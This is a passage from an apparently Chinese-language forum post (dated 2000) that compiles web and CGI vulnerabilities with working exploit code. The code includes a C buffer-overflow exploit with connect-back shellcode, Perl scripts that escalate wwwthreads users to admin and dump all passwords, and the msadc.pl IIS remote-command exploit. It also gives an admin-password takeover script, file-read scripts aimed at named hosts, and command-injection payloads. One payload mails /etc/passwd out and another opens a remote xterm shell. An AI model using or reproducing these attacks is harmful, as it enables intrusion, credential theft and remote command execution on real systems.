Make sure it\'s encoded just as the shellcode is */ int main(int argc, char **argv) { char *iploc, *evilcode; int sd, align=0; unsigned long sip; /* IP to connect back to */ unsigned long dip; /* Target IP */ unsigned long retaddy=RETADDY; /* Default return address */ /* Whee, print the banner */ if(argc < 3) { printf(\"OnWais Klote - Scrippie/Synnergy Networksn\"); printf(\"Use as: %s [ret addy] [align]n\", argv[0]); exit(0); } printf(\"******************************************************n\"); printf(\"+ OnWais Klote - Scrippie/Synnergy.net +n\"); printf(\"******************************************************n\"); /* I know inet_addr() is obsolete - too bad, you can\'t run this program when you\'re on 255.255.255.255 - who is anyway? */ if((dip = inet_addr(argv[1])) == -1) { printf(\"Error: Non valid IP address specifiedn\"); exit(-1); } if((sip = inet_addr(argv[2])) == -1) { printf(\"Error: Non valid IP address specifiedn\"); exit(-1); } /* Use specified return address */ if(argc > 3) { retaddy = strtoul(argv[3], NULL, 16); } printf(\"Return address : 0x%lxn\", retaddy); /* Use specified alignment */ if(argc > 4) { align = atoi(argv[4]); } printf(\"Alignment : %dn\", align); printf(\"Target : %snn\", argv[1]); /* We convert our IP to fit in the payload */ /* Think of this as a strange value? Think of the shellcode alignment */ sip ^= 0x1192011e; /* Check if the given RETADDY won\'t ruin our payload */ if(ICinInt(retaddy, FORBIDDEN, sizeof(FORBIDDEN)-1)) { printf(\"Error: Found illegal character in return addressn\"); exit(0); } /* Check if the given IP won\'t ruin our shellcode */ if(ICinInt(sip, FORBIDDEN, sizeof(FORBIDDEN)-1)) { printf(\"Error: Found illegal character in IP addressn\"); exit(0); } /* Locate the IP position in the shellcode */ iploc=(char *)strchr(hellcode, 0xAA); memcpy((void *) iploc, (void *) &sip, 4); evilcode = buildOverflow(retaddy, align); sd = wwwconnect(dip); printf(\"Connected to %sn\", argv[1]); printf(\"Proceeding to send evil code...n\"); send(sd, evilcode, strlen(evilcode), 0); printf(\"Sent!n\"); return(0); } char *buildOverflow(unsigned long retaddy, unsigned int align) { char source[SZ_SOURCEBUF]; char *smash, *output; int c; smash = (char *)xmalloc(SZ_FILEBUF+align+1); output = (char *)xmalloc(SZ_SOURCEBUF+SZ_FILEBUF+align+1); for(c=0;c source[253] = 0xeb; /* Jump over few bytes between arrays on stack */ source[254] = 0x08; source[255] = 0x00; /* Directory and Sourcename follow each other on stack closely There are a few arbitrary bytes between them, therefore we jump over them with 0xeb 0x08 and land somewhere in the given NOPS */ memset(smash, 0x90, 7+align); /* Few nops on the stack - waisq ruins some bytes */ smash[7+align] = 0xeb; /* Jump over the EIP that we overflow */ smash[8+align] = 0x04; /* It\'s 4 bytes big */ /* Return address gets choked in here */ memcpy(smash+9+align, &retaddy, 4); smash[13+align] = 0x00; /* strcat() needs the delimiter :) */ strcat(smash, hellcode); /* Copy the shellcode */ sprintf(output, \"GET /cgi-bin/wais.pl?-s+%s+-t+%s HTTP/1.0nn\", source, smash); /* Stuff it all on the heap */ free(smash); return(output); /* And return the pointer there */ } /* Connects to a webserver \"ip\" is expected to be in network byte order */ int wwwconnect(unsigned long ip) { struct sockaddr_in sa; /* Sockaddr */ int sd; /* Socket Descriptor */ if((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror(\"socket()\"); exit(-1); } memset(&sa, 0x00, sizeof(struct sockaddr_in)); sa.sin_port=htons(80); sa.sin_addr.s_addr=ip; if(connect(sd, &sa, sizeof(struct sockaddr_in)) == -1) { perror(\"connect()\"); exit(-1); } return(sd); } /* This function checks for illegal bytes in \"long\" types */ int ICinInt(long s, char *forbidden, size_t fsize) { int i,j; for(i=0;i for(j=0;j if((char)(s >> j*8) == forbidden) return(1); } } return(0); } /* Wrapper for malloc() that does error checking */ void *xmalloc(size_t size) { void *blah; if((blah = malloc(size)) == NULL) { perror(\"malloc()\"); exit(-1); } return(blah); } ------------------------- END ----------------------------------------------------- 四十二.wwwthreads wwwthreads是应用很广的论坛服务程序,在一些国外的安全论坛上应用较多。这套论坛程序有个漏洞,其SQL information retrieval engine允许远程用户获取用户名和密码,允许入侵者使用insert的SQL命令,获取数据库的访问权。在一个全世界最著名的黑客站点之一的论坛上测试通过。 Exploit: -[ wwwthreads.pl #!/usr/bin/perl # wwwthreads hack by rfp@wiretrip.net # elevate a user to admin status # # by rain forest puppy / rfp@wiretrip.net use Socket; ##################################################### # modify these # can be DNS or IP address $ip=\"209.143.242.119\"; $username=\"rfp\"; # remember to put a \'\' before the \'$\' characters $passhash=\"$1$V2$sadklfjasdkfhjaskdjflh\"; ##################################################### $parms=\"Cat=&Username=$username&Oldpass=$passhash\". \"&sort_order=5,U_Status%3d\'Administrator\',U_Security%3d100\". \"&display=threaded&view=collapsed&PostsPer=10\". \"&Post_Format=top&Preview=on&TextCols=60&TextRows=5&FontSize=0\". \"&FontFace=&PictureView=on&PicturePost=off\"; $tosend=\"GET /cgi-bin/wwwthreads/changedisplay.pl?$parms HTTP/1.0rn\". \"Referer: http://$ip/cgi-bin/wwwthreads/previewpost.plrnrn\"; print sendraw($tosend); sub sendraw { my ($pstr)=@_; my $target; $target= inet_aton($ip) || die(\"inet_aton problems\"); socket(S,PF_INET,SOCK_STREAM,getprotobyname(\'tcp\')||0) || die(\"Socket problemsn\"); if(connect(S,pack \"SnA4x8\",2,80,$target)){ select(S); $|=1; print $pstr; my @in=<S>; select(STDOUT); close(S); return @in; } else { die(\"Can\'t connect...n\"); }} -[ w3tpass.pl #!/usr/bin/perl # download all wwwthread usernames/passwords once you\'re administrator # send a fake cookie with authentication and fake the referer # initial passwords are 6 chars long, contain a-zA-Z0-9 EXCEPT l,O,1 # # by rain forest puppy / rfp@wiretrip.net use Socket; ##################################################### # modify these # can be DNS or IP address $ip=\"209.143.242.119\"; $username=\"rfp\"; # remember to put a \'\' before the \'$\' characters $passhash=\"$1$V2$zxcvzxvczxcvzxvczxcv\"; ##################################################### @letts=split(//,\'0ABCDEFGHIJKLMNOPQRSTUVWXYZ\'); print STDERR \"wwwthreads password snatcher by rain forest puppyrn\"; print STDERR \"Getting initial user lists...\"; foreach $let (@letts){ $parms=\"Cat=&Start=$let\"; $tosend=\"GET /cgi-bin/wwwthreads/admin/showusers.pl?$parms HTTP/1.0rn\". \"Referer: http://$ip/cgi-bin/wwwthreads/rn\". \"Cookie: Username=$username; Password=$passhashrnrn\"; my @D=sendraw($tosend); foreach $line (@D){ if($line=~/showoneuser.pl?User=([^\"]+)\">/){ push @users, $1;}}} $usercount=@users; print STDERR \"$usercount users retrieved.rn\". \"Fetching individual passwords...rn\"; foreach $user (@users){ $parms=\"User=$user\"; $tosend=\"GET /cgi-bin/wwwthreads/admin/showoneuser.pl?$parms HTTP/1.0rn\". \"Referer: http://$ip/cgi-bin/wwwthreads/rn\". \"Cookie: Username=$username; Password=$passhashrnrn\"; my @D=sendraw($tosend); foreach $line (@D){ if($line=~/OldPass value = \"([^\"]+)\"/){ ($pass=$1)=~ s/%([a-fA-F0-9][a-fA-F0-9])/pack(\"C\", hex($1))/eg; $user =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack(\"C\", hex($1))/eg; print $user.\':\'.$pass.\"::::::::::n\"; last;}}} print STDERR \"done.rnrn\"; sub sendraw { my ($pstr)=@_; my $target; $target= inet_aton($ip) || die(\"inet_aton problems\"); socket(S,PF_INET,SOCK_STREAM,getprotobyname(\'tcp\')||0) || die(\"Socket problemsn\"); if(connect(S,pack \"SnA4x8\",2,80,$target)){ select(S); $|=1; print $pstr; my @in=<S>; select(STDOUT); close(S); return @in; } else { die(\"Can\'t connect...n\"); }} 四十三.msadcs.dll IIS 4.0的缺省安装设置的是MDAC1.5,这个安装下有一个/msadc/msadcs.dll的文件,也允许通过web远程访问ODBC,获取系统的控制权.、如果web目录下的/msadc/msadcs.dll/可以访问,那么ms的任何补丁可能都没用,用类似: /%6Dsadc/%6Dsadcs.dll/V%62BusO%62j.V%62BusO%62jCls.GetRecordset 的请求,就可以绕过安全机制进行非法的VbBusObj请求,从而达到入侵的目的。 攻击程序: #将下面这段保存为txt文件,然后: \"perl -x 文件名\" #!perl # # MSADC/RDS \'usage\' (aka exploit) script # # by rain.forest.puppy # # Many thanks to Weld, Mudge, and Dildog from l0pht for helping me # beta test and find errors! use Socket; use Getopt::Std; getopts(\"e:vd:h:XR\", %args); print \"-- RDS exploit by rain forest puppy / ADM / Wiretrip --n\"; if (!defined $args{h} && !defined $args{R}) { print qq~ Usage: msadc.pl -h <host> { -d <delay> -X -v } -h <host> = host you want to scan (ip or domain) -d <seconds> = delay between calls, default 1 second -X = dump Index Server path table, if available -v = verbose -e = external dictionary file for step 5 Or a -R will resume a command session ~; exit;} $ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target=\"\"; if (defined $args{v}) { $verbose=1; } else {$verbose=0;} if (defined $args{d}) { $delay=$args{d};} else {$delay=1;} if(!defined $args{R}){ $ip.=\".\" if ($ip=~/[a-z]$/); $target= inet_aton($ip) || die(\"inet_aton problems; host doesn\'t exist?\");} if (defined $args{X} && !defined $args{R}) { &hork_idx; exit; } if (!defined $args{R}){ $ret = &has_msadc; die(\"Looks like msadcs.dll doesn\'t existn\")if $ret==0} print \"Please type the NT commandline you want to run (cmd /c assumed):n\" . \"cmd /c \"; $in=<STDIN>; chomp $in; $command=\"cmd /c \" . $in ; if (defined $args{R}) {&load; exit;} print \"nStep 1: Trying raw driver to btcustmr.mdbn\"; &try_btcustmr; print \"nStep 2: Trying to make our own DSN...\"; &make_dsn ? print \"<<success>>n\" : print \"<<fail>>n\"; print \"nStep 3: Trying known DSNs...\"; &known_dsn; print \"nStep 4: Trying known .mdbs...\"; &known_mdb; if (defined $args{e}){ print \"nStep 5: Trying dictionary of DSN names...\"; &dsn_dict; } else { \"nNo -e; Step 5 skipped.nn\"; } print \"Sorry Charley...maybe next time?n\"; exit; ############################################################################## sub sendraw { # ripped and modded from whisker sleep($delay); # it\'s a DoS on the server! At least on mine... my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname(\'tcp\')||0) || die(\"Socket problemsn\"); if(connect(S,pack \"SnA4x8\",2,80,$target)){ select(S); $|=1; print $pstr; my @in=<S>; select(STDOUT); close(S); return @in; } else { die(\"Can\'t connect...n\"); }} ############################################################################## sub make_header { # make the HTTP request my $msadc=<<EOT POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1 User-Agent: ACTIVEDATA Host: $ip Content-Length: $clen Connection: Keep-Alive ADCClientVersion:01.06 Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3 --!ADM!ROX!YOUR!WORLD! Content-Type: application/x-varg Content-Length: $reqlen EOT ; $msadc=~s/n/rn/g; return $msadc;} ############################################################################## sub make_req { # make the RDS request my ($switch, $p1, $p2)=@_; my $req=\"\"; my $t1, $t2, $query, $dsn; if ($switch==1){ # this is the btcustmr.mdb query $query=\"Select * from Customers where City=\" . make_shell(); $dsn=\"driver={Microsoft Access Driver (*.mdb)};dbq=\" . $p1 . \":\\\" . $p2 . \"\\help\\iis\\htm\\tutorial\\btcustmr.mdb;\";} elsif ($switch==2){ # this is general make table query $query=\"create table AZZ (B int, C varchar(10))\"; $dsn=\"$p1\";} elsif ($switch==3){ # this is general exploit table query $query=\"select * from AZZ where C=\" . make_shell(); $dsn=\"$p1\";} elsif ($switch==4){ # attempt to hork file info from index server $query=\"select path from scope()\"; $dsn=\"Provider=MSIDXS;\";} elsif ($switch==5){ # bad query $query=\"select\"; $dsn=\"$p1\";} $t1= make_unicode($query); $t2= make_unicode($dsn); $req = \"x02x00x03x00\"; $req.= \"x08x00\" . pack (\"S1\", length($t1)); $req.= \"x00x00\" . $t1 ; $req.= \"x08x00\" . pack (\"S1\", length($t2)); $req.= \"x00x00\" . $t2 ; $req.=\"rn--!ADM!ROX!YOUR!WORLD!--rn\"; return $req;} ############################################################################## sub make_shell { # this makes the shell() statement return \"\'|shell(\"$command\")|\'\";} ############################################################################## sub make_unicode { # quick little function to convert to unicode my ($in)=@_; my $out; for ($c=0; $c < length($in); $c++) { $out.=substr($in,$c,1) . \"x00\"; } return $out;} ############################################################################## sub rdo_success { # checks for RDO return success (this is kludge) my (@in) = @_; my $base=content_start(@in); if($in[$base]=~/multipart/mixed/){ return 1 if( $in[$base+10]=~/^x09x00/ );} return 0;} ############################################################################## sub make_dsn { # this makes a DSN for us my @drives=(\"c\",\"d\",\"e\",\"f\"); print \"nMaking DSN: \"; foreach $drive (@drives) { print \"$drive: \"; my @results=sendraw(\"GET /scripts/tools/newdsn.exe?driver=Microsoft%2B\" . \"Access%2BDriver%2B%28*.mdb%29&dsn=wicca&dbq=\" . $drive . \"%3A%5Csys.mdb&newdb=CREATE_DB&attr= HTTP/1.0nn\"); $results[0]=~m#HTTP/([0-9.]+) ([0-9]+) ([^n]*)#; return 0 if $2 eq \"404\"; # not found/doesn\'t exist if($2 eq \"200\") { foreach $line (@results) { return 1 if $line=~/<H2>Datasource creation successful</H2>/;}} } return 0;} ############################################################################## sub verify_exists { my ($page)=@_; my @results=sendraw(\"GET $page HTTP/1.0nn\"); return $results[0];} ############################################################################## sub try_btcustmr { my @drives=(\"c\",\"d\",\"e\",\"f\"); my @dirs=(\"winnt\",\"winnt35\",\"winnt351\",\"win\",\"windows\"); foreach $dir (@dirs) { print \"$dir -> \"; # fun status so you can see progress foreach $drive (@drives) { print \"$drive: \"; # ditto $reqlen=length( make_req(1,$drive,$dir) ) - 28; $reqlenlen=length( \"$reqlen\" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(1,$drive,$dir)); if (rdo_success(@results)){print \"Success!n\";save(1,1,$drive,$dir);exit;} else { verbose(odbc_error(@results)); funky(@results);}} print \"n\";}} ############################################################################## sub odbc_error { my (@in)=@_; my $base; my $base = content_start(@in); if($in[$base]=~/application/x-varg/){ # it *SHOULD* be this $in[$base+4]=~s/[^a-zA-Z0-9 []:/\\\'()]//g; $in[$base+5]=~s/[^a-zA-Z0-9 []:/\\\'()]//g; $in[$base+6]=~s/[^a-zA-Z0-9 []:/\\\'()]//g; return $in[$base+4].$in[$base+5].$in[$base+6];} print \"nNON-STANDARD error. Please sent this info to rfp@wiretrip.net:n\"; print \"$in : \" . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] . $in[$base+4] . $in[$base+5] . $in[$base+6]; exit;} ############################################################################## sub verbose { my ($in)=@_; return if !$verbose; print STDOUT \"n$inn\";} ############################################################################## sub save { my ($p1, $p2, $p3, $p4)=@_; open(OUT, \">rds.save\") || print \"Problem saving parameters...n\"; print OUT \"$ipn$p1n$p2n$p3n$p4n\"; close OUT;} ############################################################################## sub load { my @p; my $drvst=\"driver={Microsoft Access Driver (*.mdb)}; dbq=\"; open(IN,\"<rds.save\") || die(\"Couldn\'t open rds.saven\"); @p=<IN>; close(IN); $ip=\"$p[0]\"; $ip=~s/n//g; $ip.=\".\" if ($ip=~/[a-z]$/); $target= inet_aton($ip) || die(\"inet_aton problems\"); print \"Resuming to $ip ...\"; $p[3]=\"$p[3]\"; $p[3]=~s/n//g; $p[4]=\"$p[4]\"; $p[4]=~s/n//g; if($p[1]==1) { $reqlen=length( make_req(1,\"$p[3]\",\"$p[4]\") ) - 28; $reqlenlen=length( \"$reqlen\" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(1,\"$p[3]\",\"$p[4]\")); if (rdo_success(@results)){print \"Success!n\";} else { print \"failedn\"; verbose(odbc_error(@results));}} elsif ($p[1]==3){ if(run_query(\"$p[3]\")){ print \"Success!n\";} else { print \"failedn\"; }} elsif ($p[1]==4){ if(run_query($drvst . \"$p[3]\")){ print \"Success!n\"; } else { print \"failedn\"; }} exit;} ############################################################################## sub create_table { my ($in)=@_; $reqlen=length( make_req(2,$in,\"\") ) - 28; $reqlenlen=length( \"$reqlen\" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(2,$in,\"\")); return 1 if rdo_success(@results); my $temp= odbc_error(@results); verbose($temp); return 1 if $temp=~/Table \'AZZ\' already exists/; return 0;} ############################################################################## sub known_dsn { # we want \'wicca\' first, because if step 2 made the DSN, it\'s ready to go my @dsns=(\"wicca\", \"AdvWorks\", \"pubs\", \"CertSvr\", \"CFApplications\", \"cfexamples\", \"CFForums\", \"CFRealm\", \"cfsnippets\", \"UAM\", \"banner\", \"banners\", \"ads\", \"ADCDemo\", \"ADCTest\"); foreach $dSn (@dsns) { print \".\"; next if (!is_access(\"DSN=$dSn\")); if(create_table(\"DSN=$dSn\")){ print \"$dSn successfuln\"; if(run_query(\"DSN=$dSn\")){ print \"Success!n\"; save (3,3,\"DSN=$dSn\",\"\"); exit; } else { print \"Something\'s borked. Use verbose next timen\";}}} print \"n\";} ############################################################################## sub is_access { my ($in)=@_; $reqlen=length( make_req(5,$in,\"\") ) - 28; $reqlenlen=length( \"$reqlen\" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(5,$in,\"\")); my $temp= odbc_error(@results); verbose($temp); return 1 if ($temp=~/Microsoft Access/); return 0;} ############################################################################## sub run_query { my ($in)=@_; $reqlen=length( make_req(3,$in,\"\") ) - 28; $reqlenlen=length( \"$reqlen\" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(3,$in,\"\")); return 1 if rdo_success(@results); my $temp= odbc_error(@results); verbose($temp); return 0;} ############################################################################## sub known_mdb { my @drives=(\"c\",\"d\",\"e\",\"f\",\"g\"); my @dirs=(\"winnt\",\"winnt35\",\"winnt351\",\"win\",\"windows\"); my $dir, $drive, $mdb; my $drv=\"driver={Microsoft Access Driver (*.mdb)}; dbq=\"; # this is sparse, because I don\'t know of many my @sysmdbs=( \"\\catroot\\icatalog.mdb\", \"\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb\", \"\\system32\\certmdb.mdb\", \"\\system32\\certlog\\certsrv.mdb\" ); #these are %systemroot% my @mdbs=( \"\\cfusion\\cfapps\\cfappman\\data\\applications.mdb\", \"\\cfusion\\cfapps\\forums\\forums_.mdb\", \"\\cfusion\\cfapps\\forums\\data\\forums.mdb\", \"\\cfusion\\cfapps\\security\\realm_.mdb\", \"\\cfusion\\cfapps\\security\\data\\realm.mdb\", \"\\cfusion\\database\\cfexamples.mdb\", \"\\cfusion\\database\\cfsnippets.mdb\", \"\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb\", \"\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb\", \"\\cfusion\\brighttiger\\database\\cleam.mdb\", \"\\cfusion\\database\\smpolicy.mdb\", \"\\cfusion\\databasecypress.mdb\", \"\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb\", \"\\website\\cgi-win\\dbsample.mdb\", \"\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb\", \"\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb\" ); #these are just foreach $drive (@drives) { foreach $dir (@dirs){ foreach $mdb (@sysmdbs) { print \".\"; if(create_table($drv . $drive . \":\\\" . $dir . $mdb)){ print \"n\" . $drive . \":\\\" . $dir . $mdb . \" successfuln\"; if(run_query($drv . $drive . \":\\\" . $dir . $mdb)){ print \"Success!n\"; save (4,4,$drive . \":\\\" . $dir . $mdb,\"\"); exit; } else { print \"Something\'s borked. Use verbose next timen\"; }}}}} foreach $drive (@drives) { foreach $mdb (@mdbs) { print \".\"; if(create_table($drv . $drive . $dir . $mdb)){ print \"n\" . $drive . $dir . $mdb . \" successfuln\"; if(run_query($drv . $drive . $dir . $mdb)){ print \"Success!n\"; save (4,4,$drive . $dir . $mdb,\"\"); exit; } else { print \"Something\'s borked. Use verbose next timen\"; }}}} } ############################################################################## sub hork_idx { print \"nAttempting to dump Index Server tables...n\"; print \" NOTE: Sometimes this takes a while, other times it stallsnn\"; $reqlen=length( make_req(4,\"\",\"\") ) - 28; $reqlenlen=length( \"$reqlen\" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw2(make_header() . make_req(4,\"\",\"\")); if (rdo_success(@results)){ my $max=@results; my $c; my %d; for($c=19; $c<$max; $c++){ $results[$c]=~s/x00//g; $results[$c]=~s/[^a-zA-Z0-9:~ \\._]{1,40}/n/g; $results[$c]=~s/[^a-zA-Z0-9:~ \\._n]//g; $results[$c]=~/([a-zA-Z]:\\)([a-zA-Z0-9 _~\\]+)\\/; $d{\"$1$2\"}=\"\";} foreach $c (keys %d){ print \"$cn\"; } } else {print \"Index server doesn\'t seem to be installed.n\"; }} ############################################################################## sub dsn_dict { open(IN, \"<$args{e}\") || die(\"Can\'t open external dictionaryn\"); while(<IN>){ $hold=$_; $hold=~s/[rn]//g; $dSn=\"$hold\"; print \".\"; next if (!is_access(\"DSN=$dSn\")); if(create_table(\"DSN=$dSn\")){ print \"$dSn successfuln\"; if(run_query(\"DSN=$dSn\")){ print \"Success!n\"; save (3,3,\"DSN=$dSn\",\"\"); exit; } else { print \"Something\'s borked. Use verbose next timen\";}}} print \"n\"; close(IN);} ############################################################################## sub sendraw2 { # ripped and modded from whisker sleep($delay); # it\'s a DoS on the server! At least on mine... my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname(\'tcp\')||0) || die(\"Socket problemsn\"); if(connect(S,pack \"SnA4x8\",2,80,$target)){ print \"Connected. Getting data\"; open(OUT,\">raw.out\"); my @in; select(S); $|=1; print $pstr; while(<S>){ print OUT $_; push @in, $_; print STDOUT \".\";} close(OUT); select(STDOUT); close(S); return @in; } else { die(\"Can\'t connect...n\"); }} ############################################################################## sub content_start { # this will take in the server headers my (@in)=@_; my $c; for ($c=1;$c<500;$c++) { if($in[$c] =~/^x0dx0a/){ if ($in[$c+1]=~/^HTTP/1.[01] [12]00/) { $c++; } else { return $c+1; }}} return -1;} # it should never get here actually ############################################################################## sub funky { my (@in)=@_; my $error=odbc_error(@in); if($error=~/ADO could not find the specified provider/){ print \"nServer returned an ADO miscofiguration messagenAborting.n\"; exit;} if($error=~/A Handler is required/){ print \"nServer has custom handler filters (they most likely are patched)n\"; exit;} if($error=~/specified Handler has denied Access/){ print \"nServer has custom handler filters (they most likely are patched)n\"; exit;}} ############################################################################## sub has_msadc { my @results=sendraw(\"GET /msadc/msadcs.dll HTTP/1.0nn\"); my $base=content_start(@results); return 1 if($results[$base]=~/Content-Type: application/x-varg/); return 0;} ######################## 四十四. SmartWin CyberOffice Shopping Cart Smartwin Technology CyberOffice Shopping Cart是一种购物车应用程序,它被用在那些运行Windows NT 4.0或2000系统、允许进行电子商务交易的网站上。远程用户可能读取运行有Smartwin Technology CyberOffice Shopping Cart 2.0的网站的_private目录。默认情况下任何人对_private目录都有读权限。 攻击:http://target/_private/shopping_cart.mdb 四十五. Moreover.com CGI 文件泄露漏洞 新闻服务商Moreover.com 提供的catched_feed.cgi V1.0的脚本存在这样一个漏洞;这个脚本有获得文件 的功能,本来是用来返回一个指定文件的内容给浏览器,可是由于没有在用户输入的字符串中过滤\"..\"字符串,所以通过构造一个URL,提交给这个脚本,可以获得CGI脚本不允许的文件内容,必须保证这个文件是HTTP用户可以读的; 攻击:http://victim/cgi-bin/cached_feed.cgi?../../../.+/etc/passwd 四十六. Unixware SCOhelp CGI程序格式串漏洞 SCO Unixware 7 缺省安装时会包含sochelp组件。这是一个监听在tcp 457端口的HTTP服务器,允许用户访问帮助手册以及其他的一些文档。它的一个用来完成搜索功能的CGI程序存在一个格式串漏洞,允许远程用户在主机上执行任意代码。尽管攻击者只能得到\'nobody\'用户权限(缺省状态下),仍然会给用户非法访问主机系统的机会,他可能进一步获取更高权限。 攻击:http://target:457/search97cgi/vtopic?Action=FilterSearch&filter=&queryText=%25x 可以让服务器产生下列响应: -- Internal error: STR_sprintf: Invalid format (Error E1-0142 (Query Builder): Invalid character \'%\' (0x25)) Result Search failed: -40 Result Error E1-0142 (Query Builder): Invalid character \' Result Error E1-0130 (Query Builder): Syntax error in query string near character 1 Result Error E1-0133 (Query Builder): Error parsing query: 81887e0 Result VdkSearchNew failed, error -40 Result Request failed for REQUEST_METHOD=, QUERY_STRING= Component Component (vsearch) failed in processing request, -2 Action Action (FilterSearch) failed while processing request in component (vsearch), -2 Service Manager Action (FilterSearch) failed in processing request, -2 S97IS Service manager failed to process request 四十七. Subscribe Me LITE 更改管理员口令漏洞 任何远程用户都能修改CGI Script Centers\' Subscribe Me Lite的管理员口令。这使得远程用户拥有完全的管理权限,包括从邮件列表中增加和删除用户。 攻击: #!/usr/bin/perl -w ## Subscribe Me Lite 2.0 exploit / www.cgiscriptcenter.com ## This exploits changes the administrator password and ## let\'s anyone take over the mailing list. You can send ## bogus e-mail to everyone on the list. ## ## May work on earlier versions, but not sure - not sure ## if it will work on the Professional version either. ## ## teleh0r@doglover.com / anno 2000 ## httpd://teleh0r.cjb.net use strict; use Socket; if (@ARGV < 2) { print(\"Usage: $0 <target> <newpass>\\n\"); exit(1); } my($target,$newpass,$crypt,$length,$command,$agent,$sploit,$iaddr,$paddr,$pr oto); ($target,$newpass) = @ARGV; $crypt = crypt($newpass, \'aa\'); $length = 34 + length($newpass); print(\"\\nRemote host: $target\\n\"); print(\"CGI-script: /cgi-bin/subscribe.pl\\n\"); print(\"New password: $newpass / $crypt\\n\\n\"); $command = \"pwd=$newpass&pwd2=$newpass&setpwd=++Set+Password++\"; $agent = \"Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)\"; $sploit= \"POST /cgi-bin/subscribe.pl HTTP/1.0 Connection: close User-Agent: $agent Host: $target Content-type: application/x-www-form-urlencoded Content-length: $length $command\"; $iaddr = inet_aton($target) || die(\"Error: $!\\n\"); $paddr = sockaddr_in(80, $iaddr) || die(\"Error: $!\\n\"); $proto = getprotobyname(\'tcp\') || die(\"Error: $!\\n\"); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die(\"Error: $!\\n\"); connect(SOCKET, $paddr) || die(\"Error: $!\\n\"); send(SOCKET,\"$sploit\\015\\012\", 0) || die(\"Error: $!\\n\"); close(SOCKET); sleep(2); print(\"Check out: http://$target/cgi-bin/subscribe.pl\\n\"); exit(0); 四十八. Htgrep CGI程序泄漏系统文件内容 htgrep中的htgrep.pl脚本存在一个安全问题,远程用户可以以web服务器运行时的身份读取任意系统文件。 攻击: http://www.dematel.com/cgibin/htgrep/file=index.html&hdr=/etc/passwd 一个perl脚本 #!/usr/local/bin/perl # # Htgrep EXPLOIT Script by n30 17/8/2000 # # For: Unix/Linux all Distro\'s # maybe Winnt?? anyone?? # # Versions: All upto latest: htgrep v3.0 # # Info: to find the version number being used: # # www.server.com/cgi-bin/htgrep/version # # Some ppl use a wrapper for the script thusly # eliminating the file argument, the sploit will # still werk just add &hdr=<filename> to the end :-) # # if &isindex=<text> is present in the URL REMOVE IT!!! # or else the exploit won\'t werk :-) # # Mail : n30@gmx.co.uk use strict; use LWP::UserAgent; use HTTP::Request; use HTTP::Response; my $ua = new LWP::UserAgent; # ************************************************* my $TargetHost=\"www.dematel.com\"; my $TargetPath=\"/cgibin/htgrep\"; # SearchFile can commonly be index.html or some other file in the wwwroot my $SearchFile=\"index.html\"; # FiletoGet ?? think for ur self :-) my $FiletoGet=\"/etc/passwd\"; # ************************************************** my $url=\"http://\".$TargetHost.$TargetPath.\"/file=$SearchFile&hd r=$FiletoGet\"; print(\"\\nHtgrep Arbitrary File Reading Vulnerability EXPLOIT /n30\\n\\n\"); print(\"URL: $url\\n\\n\"); my $request = new HTTP::Request(\'GET\', $url); my $response = $ua->request($request); if ($response->is_success) { print $response->content; } else { print $response->error_as_HTML; } # Definitely NOT Hack.co.za 四十九. DBMan db.cgi泄漏敏感信息漏洞 当向一个正在运行Gossamer Threads DBMan脚本的web服务器请求一个不存在的数据库文件时,web服务器将返回一个错误信息,里面包含环境变量信息,这些环境变量信息包含web服务器的document root路径以及管理员账号名,web服务器版本,平台等等敏感信息。 攻击: http://www.victim.com/scripts/dbman/db.cgi?db=blahblah 五十. 多个whois CGI程序中的安全漏洞 Whois Internic Lookup - version: 1.0,CC Whois - Version: 1.0,Matt\'s Whois - Version: 1版本中的whois CGI程序没有过滤shell命令字符,如果向其输入如下查询字符串时,将会执行其中的命令。 攻击: 1) ;commands 2) \";commands 3) ;commands; 如: 输入whois查询字符串: 1) ;id 2) \";id 3) ;id; 将得到如下输出: uid=501(blah) gid=500(blah)\' 另外一些例子: ;xterm -display ip:0.0 -rv -e /bin/sh \";uname -a;whoami;w;ls -al ;cat /etc/passwd|mail you@yourdomain.com; 五十一. FormHandler.cgi回复附件漏洞 对于FormHandler.cgi(通常在unix系统下以\'nobody\'运行)有读权限的文件都可以做为回复邮件的附件。这就造成了攻击者可以通过修改form文件来获取如/etc/passwd等敏感文件。 攻击: @ALLOWED_ATTACH_DIRS = (\'all\'); # hmm, nice defaults ;) @RESTRICTED_ATTACH_DIRS = (\'/etc/\'); [...] if (&valid_directory($filename)) { # let\'s check if file is allowed push(@files, $filename); [...] } # to send [...] sub valid_directory { local ($filename) = $_[0]; local ($allowed_path, $restricted_path); local($valid_dir) = 0; if ($ALLOWED_ATTACH_DIRS[0] =~ /^all$/i) { $valid_dir = 1 } else { foreach $allowed_path (@ALLOWED_ATTACH_DIRS) { $valid_dir = ($filename =~ /^$allowed_path/); # silly ... last if $valid_dir; } } foreach $restricted_path (@RESTRICTED_ATTACH_DIRS) { $valid_dir = ($filename !~ /^$restricted_path/); # once more last if !$valid_dir; } return $valid_dir; } [...] How to d/l /etc/passwd ? Just add this to the form: VALUE=\"text:/tmp/../etc/passwd\"> 此文章欢迎任意增加、散播,还有很多很多网络程序漏洞,希望大家添加及补充. 无用君 9/28/00 |
|
最新喜欢:baoyib...
|